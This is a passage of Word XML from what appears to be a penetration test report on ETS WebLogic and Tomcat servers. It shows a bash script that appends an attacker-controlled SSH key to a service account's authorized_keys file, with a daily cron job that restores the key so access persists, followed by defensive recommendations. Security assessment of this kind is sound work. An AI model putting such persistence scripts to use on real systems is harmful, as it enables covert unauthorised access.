        <w:t xml:space="preserve">, but allowing to execute scheduled jobs through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00811C29" w:rsidRPr="001019D3">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00811C29" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> allows to put back the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00F434B3" w:rsidRPr="001019D3">
        <w:t>-c</w:t>
      </w:r>
      <w:r w:rsidR="00811C29" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">ontrolled keys </w:t>
      </w:r>
      <w:r w:rsidR="00F434B3" w:rsidRPr="001019D3">
        <w:t>on a specific time of day on a daily basis to maintain access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530E0183" w14:textId="060AF5D4" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00F434B3">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>To automate the process a script was developed with the following code</w:t>
      </w:r>
      <w:r w:rsidR="00F434B3" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> to add the attacker key in the authorised keys file</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8746"/>
      </w:tblGrid>
      <w:tr w:rsidR="0020401E" w:rsidRPr="001019D3" w14:paraId="02C3C34E" w14:textId="77777777" w:rsidTr="00F434B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9518" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="150CF872" w14:textId="6A06097F" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00F434B3">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>#!/bin/bash</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DA3E217" w14:textId="77777777" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00F434B3">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 600 /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/local/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>weblogic</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/u010/home/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlsopert</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/.ssh/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>authorized_keys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="03255A6F" w14:textId="6017F020" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00F434B3">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>echo 'ssh-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>rsa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> AAAAB3NzaC1yc2EAAAADAQAB &lt;…</w:t>
            </w:r>
            <w:r w:rsidR="00F434B3" w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>snip</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>…&gt; /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>kypAzByqwtn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/GSVcSm4XZaymWwu8+Xf4XqBSAQ== test@test.europa.eu' &gt;&gt; /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/local/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>weblogic</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/u010/home/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlsopert</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/.ssh/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>authorized_keys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4B0B1224" w14:textId="77777777" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00F434B3">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 400 /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/local/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>weblogic</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/u010/home/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlsopert</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/.ssh/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>authorized_keys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B2831BF" w14:textId="1B58E331" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00F434B3">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00F434B3" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> next step requires to check and edit the crontab file, which maintains all scheduled </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F434B3" w:rsidRPr="001019D3">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F434B3" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> jobs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40093EE3" w14:textId="77777777" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00F434B3">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6468255F" wp14:editId="0D4652E4">
            <wp:extent cx="5480050" cy="1468728"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="170096568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5685" name="Picture 1" descr="A computer screen shot of text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId24" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="43558"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5544320" cy="1485953"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBE546B" w14:textId="63578551" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00F434B3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="163" w:name="_Toc213253791"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F434B3" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">crontab before </w:t>
      </w:r>
      <w:r w:rsidR="00F434B3" w:rsidRPr="001019D3">
        <w:t>adding SSH persistence script.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="163"/>
    </w:p>
    <w:p w14:paraId="49B9716D" w14:textId="77777777" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00D95F69">
      <w:pPr>
        <w:spacing w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Screen clipping taken: 04/03/2025 11:08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A41334B" w14:textId="77777777" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="0020401E">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50DAA760" wp14:editId="372122F1">
            <wp:extent cx="5454650" cy="1392689"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2237148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4882" name="Picture 2"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66949" cy="1395829"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6259B623" w14:textId="6C32DC83" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="0020401E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="164" w:name="_Toc213253792"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F434B3" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">crontab after </w:t>
      </w:r>
      <w:r w:rsidR="00F434B3" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">adding the SSH persistence </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidR="00F434B3" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="164"/>
    </w:p>
    <w:p w14:paraId="26AD3A27" w14:textId="77777777" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00D95F69">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Screen clipping taken: 04/03/2025 11:10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9CB10C" w14:textId="7A066C72" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00D95F69">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">As it can be seen from the figure above </w:t>
      </w:r>
      <w:r w:rsidR="00F434B3" w:rsidRPr="001019D3">
        <w:t>the new</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> script would run daily at 10:30 a.m. The attacker could connect using SSH at this time and would gain access to the system as the user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>wlsopert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="080A8F22" w14:textId="1214B4FC" w:rsidR="00F434B3" w:rsidRPr="001019D3" w:rsidRDefault="00F434B3" w:rsidP="00AE5D38">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The list of servers used gather the scheduled job persistence proof can be found in annex</w:t>
      </w:r>
      <w:r w:rsidR="001236CA" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001236CA" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001236CA" w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref212817397 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="001236CA" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>5.2.2</w:t>
      </w:r>
      <w:r w:rsidR="001236CA" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> that this could have been done on any system listed in</w:t>
      </w:r>
      <w:r w:rsidR="00412AA9" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001236CA" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001236CA" w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref212817406 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="001236CA" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>5.2.1</w:t>
      </w:r>
      <w:r w:rsidR="001236CA" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B995C58" w14:textId="77777777" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00B44CC1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38043EAD" w14:textId="56FD4231" w:rsidR="001236CA" w:rsidRPr="001019D3" w:rsidRDefault="001236CA" w:rsidP="00503324">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Enable monitoring and alerting on changes in the </w:t>
      </w:r>
      <w:r w:rsidR="009E5C13" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">service </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009E5C13" w:rsidRPr="001019D3">
        <w:t>account</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> .ssh folder</w:t>
      </w:r>
      <w:r w:rsidR="00503324" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> of all ETS WebLogic and Tomcat servers</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DBA906" w14:textId="29F30178" w:rsidR="001236CA" w:rsidRPr="001019D3" w:rsidRDefault="001236CA" w:rsidP="00503324">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Restrict access </w:t>
      </w:r>
      <w:r w:rsidR="00AC0461" w:rsidRPr="001019D3">
        <w:t>via</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> SSH from unauthorised locations (IP whitelist)</w:t>
      </w:r>
      <w:r w:rsidR="00503324" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> to all ETS WebLogic and Tomcat servers</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3566C11B" w14:textId="506DD103" w:rsidR="001236CA" w:rsidRPr="001019D3" w:rsidRDefault="001236CA" w:rsidP="00503324">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Enable monitoring and alerting of interactive logins of </w:t>
      </w:r>
      <w:r w:rsidR="00503324" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">service </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>accounts used for hosting services</w:t>
      </w:r>
      <w:r w:rsidR="00503324" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> on all ETS WebLogic and Tomcat servers</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BAC387" w14:textId="693559D8" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00503324">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Configure </w:t>
      </w:r>
      <w:r w:rsidR="00AC0461" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">auditing and </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">logging </w:t>
      </w:r>
      <w:r w:rsidR="00503324" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">on all ETS WebLogic and Tomcat servers </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">so that any creation, deletion, or modification of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> entries is captured and forwarded to a centralized log management or SIEM platform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EA85D4" w14:textId="3E3852D5" w:rsidR="00AC0461" w:rsidRPr="001019D3" w:rsidRDefault="00AC0461" w:rsidP="00503324">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Restrict use and modification of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0020401E" w:rsidRPr="001019D3">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0020401E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> jobs </w:t>
      </w:r>
      <w:r w:rsidR="00503324" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">on all ETS WebLogic and Tomcat servers </w:t>
      </w:r>
      <w:r w:rsidR="0020401E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">to authorized administrators only, </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="0020401E" w:rsidRPr="001019D3">
        <w:t>hanges should follow strict change management processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F34EBB3" w14:textId="624658A7" w:rsidR="00AC0461" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00503324">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Regularly review scheduled tasks </w:t>
